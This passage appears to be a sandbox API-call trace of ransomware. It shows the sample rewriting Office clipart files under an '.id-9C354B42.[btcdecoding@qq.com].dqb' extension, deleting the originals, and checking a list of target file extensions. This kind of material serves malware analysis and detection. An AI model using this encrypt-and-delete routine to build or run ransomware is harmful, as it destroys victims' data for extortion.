lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.229] SetEndOfFile (hFile=0x178) returned 1 [0051.230] CloseHandle (hObject=0x178) returned 1 [0051.230] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.230] SetEndOfFile (hFile=0x224) returned 1 [0051.230] CloseHandle (hObject=0x224) returned 1 [0051.230] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.231] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf")) returned 1 [0051.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0051.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0051.231] lstrlenW (lpString=".doc") returned 4 [0051.231] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.231] lstrlenW (lpString=".docx") returned 5 [0051.231] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.231] lstrlenW (lpString=".pdf") returned 4 [0051.231] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.231] lstrlenW (lpString=".xls") returned 4 [0051.231] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.231] lstrlenW (lpString=".xlsx") returned 5 [0051.231] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.231] lstrlenW (lpString=".ppt") returned 4 [0051.231] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0051.231] lstrlenW (lpString=".zip") returned 4 [0051.231] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.231] lstrlenW (lpString=".rar") returned 4 [0051.231] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.231] lstrlenW (lpString=".bz2") returned 4 [0051.231] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.231] lstrlenW (lpString=".7z") returned 3 [0051.231] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0051.232] lstrlenW (lpString=".dbf") returned 4 [0051.232] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0051.232] lstrlenW (lpString=".1cd") returned 4 [0051.232] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0051.232] lstrlenW (lpString=".jpg") returned 4 [0051.232] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.232] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.232] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0051.232] GetLastError () returned 0x0 [0051.232] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1ccc, lpOverlapped=0x0) returned 1 [0051.234] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1cd0, lpOverlapped=0x0) returned 1 [0051.235] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.235] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.235] SetEndOfFile (hFile=0x178) returned 1 [0051.235] CloseHandle (hObject=0x178) returned 1 [0051.235] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.235] SetEndOfFile (hFile=0x224) returned 1 [0051.236] CloseHandle (hObject=0x224) returned 1 [0051.236] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.236] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf")) returned 1 [0051.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0051.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0051.237] lstrlenW (lpString=".doc") returned 4 [0051.237] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.237] lstrlenW (lpString=".docx") returned 5 [0051.237] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.237] lstrlenW (lpString=".pdf") returned 4 [0051.237] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.237] lstrlenW (lpString=".xls") returned 4 [0051.237] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.237] lstrlenW (lpString=".xlsx") returned 5 [0051.237] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.237] lstrlenW (lpString=".ppt") returned 4 [0051.237] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0051.237] lstrlenW (lpString=".zip") returned 4 [0051.237] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.237] lstrlenW (lpString=".rar") returned 4 [0051.237] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.237] lstrlenW (lpString=".bz2") returned 4 [0051.237] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.237] lstrlenW (lpString=".7z") returned 3 [0051.237] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0051.237] lstrlenW (lpString=".dbf") returned 4 [0051.237] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0051.237] lstrlenW (lpString=".1cd") returned 4 [0051.237] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0051.237] lstrlenW (lpString=".jpg") returned 4 [0051.237] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.238] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.238] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0051.239] GetLastError () returned 0x0 [0051.239] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1d74, lpOverlapped=0x0) returned 1 [0051.602] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1d80, lpOverlapped=0x0) returned 1 [0051.602] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.602] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.603] SetEndOfFile (hFile=0x178) returned 1 [0052.011] CloseHandle (hObject=0x178) returned 1 [0052.012] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.012] SetEndOfFile (hFile=0x224) returned 1 [0052.012] CloseHandle (hObject=0x224) returned 1 [0052.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.013] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf")) returned 1 [0052.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.487] lstrlenW (lpString=".doc") returned 4 [0052.487] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.487] lstrlenW (lpString=".docx") returned 5 [0052.487] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.487] lstrlenW (lpString=".pdf") returned 4 [0052.487] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.487] lstrlenW (lpString=".xls") returned 4 [0052.487] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.487] lstrlenW (lpString=".xlsx") returned 5 [0052.487] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.487] lstrlenW (lpString=".ppt") returned 4 [0052.487] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.487] lstrlenW (lpString=".zip") returned 4 [0052.487] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.487] lstrlenW (lpString=".rar") returned 4 [0052.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.487] lstrlenW (lpString=".bz2") returned 4 [0052.487] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.487] lstrlenW (lpString=".7z") returned 3 [0052.487] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.487] lstrlenW (lpString=".dbf") returned 4 [0052.487] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.487] lstrlenW (lpString=".1cd") returned 4 [0052.487] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0052.487] lstrlenW (lpString=".jpg") returned 4 [0052.487] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.040] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.045] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0053.548] GetLastError () returned 0x0 [0053.548] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1204, lpOverlapped=0x0) returned 1 [0053.549] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1210, lpOverlapped=0x0) returned 1 [0053.550] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.550] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.550] SetEndOfFile (hFile=0x17c) returned 1 [0053.550] CloseHandle (hObject=0x17c) returned 1 [0053.550] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.550] SetEndOfFile (hFile=0x184) returned 1 [0053.551] CloseHandle (hObject=0x184) returned 1 [0053.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.551] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf")) returned 1 [0053.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.552] lstrlenW (lpString=".doc") returned 4 [0053.552] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.552] lstrlenW (lpString=".docx") returned 5 [0053.552] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.552] lstrlenW (lpString=".pdf") returned 4 [0053.552] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.552] lstrlenW (lpString=".xls") returned 4 [0053.552] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.552] lstrlenW (lpString=".xlsx") returned 5 [0053.552] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.552] lstrlenW (lpString=".ppt") returned 4 [0053.552] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.552] lstrlenW (lpString=".zip") returned 4 [0053.552] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.552] lstrlenW (lpString=".rar") returned 4 [0053.552] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.552] lstrlenW (lpString=".bz2") returned 4 [0053.552] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.552] lstrlenW (lpString=".7z") returned 3 [0053.552] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.552] lstrlenW (lpString=".dbf") returned 4 [0053.552] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.552] lstrlenW (lpString=".1cd") returned 4 [0053.552] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0053.552] lstrlenW (lpString=".jpg") returned 4 [0053.552] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.553] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.553] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0053.553] GetLastError () returned 0x0 [0053.553] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x5f00, lpOverlapped=0x0) returned 1 [0053.555] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x5f10, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x5f10, lpOverlapped=0x0) returned 1 [0053.556] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.556] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.556] SetEndOfFile (hFile=0x17c) returned 1 [0053.556] CloseHandle (hObject=0x17c) returned 1 [0053.556] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.556] SetEndOfFile (hFile=0x184) returned 1 [0053.557] CloseHandle (hObject=0x184) returned 1 [0053.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.557] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf")) returned 1 [0053.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0053.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0053.558] lstrlenW (lpString=".doc") returned 4 [0053.558] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.558] lstrlenW (lpString=".docx") returned 5 [0053.558] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.558] lstrlenW (lpString=".pdf") returned 4 [0053.558] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.558] lstrlenW (lpString=".xls") returned 4 [0053.558] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.558] lstrlenW (lpString=".xlsx") returned 5 [0053.558] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.558] lstrlenW (lpString=".ppt") returned 4 [0053.558] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0053.558] lstrlenW (lpString=".zip") returned 4 [0053.558] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.558] lstrlenW (lpString=".rar") returned 4 [0053.558] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.558] lstrlenW (lpString=".bz2") returned 4 [0053.558] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.558] lstrlenW (lpString=".7z") returned 3 [0053.558] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0053.558] lstrlenW (lpString=".dbf") returned 4 [0053.558] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0053.558] lstrlenW (lpString=".1cd") returned 4 [0053.558] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0053.558] lstrlenW (lpString=".jpg") returned 4 [0053.558] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.559] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.559] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0053.559] GetLastError () returned 0x0 [0053.559] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x60ca, lpOverlapped=0x0) returned 1 [0053.561] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x60d0, lpOverlapped=0x0) returned 1 [0053.562] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.562] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.562] SetEndOfFile (hFile=0x17c) returned 1 [0053.562] CloseHandle (hObject=0x17c) returned 1 [0053.562] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.562] SetEndOfFile (hFile=0x184) returned 1 [0053.564] CloseHandle (hObject=0x184) returned 1 [0053.564] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.564] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf")) returned 1 [0053.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0053.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0053.564] lstrlenW (lpString=".doc") returned 4 [0053.564] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.564] lstrlenW (lpString=".docx") returned 5 [0053.564] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.564] lstrlenW (lpString=".pdf") returned 4 [0053.564] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.564] lstrlenW (lpString=".xls") returned 4 [0053.565] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.565] lstrlenW (lpString=".xlsx") returned 5 [0053.565] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.565] lstrlenW (lpString=".ppt") returned 4 [0053.565] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0053.565] lstrlenW (lpString=".zip") returned 4 [0053.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.565] lstrlenW (lpString=".rar") returned 4 [0053.565] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.565] lstrlenW (lpString=".bz2") returned 4 [0053.565] lstrcmpiW 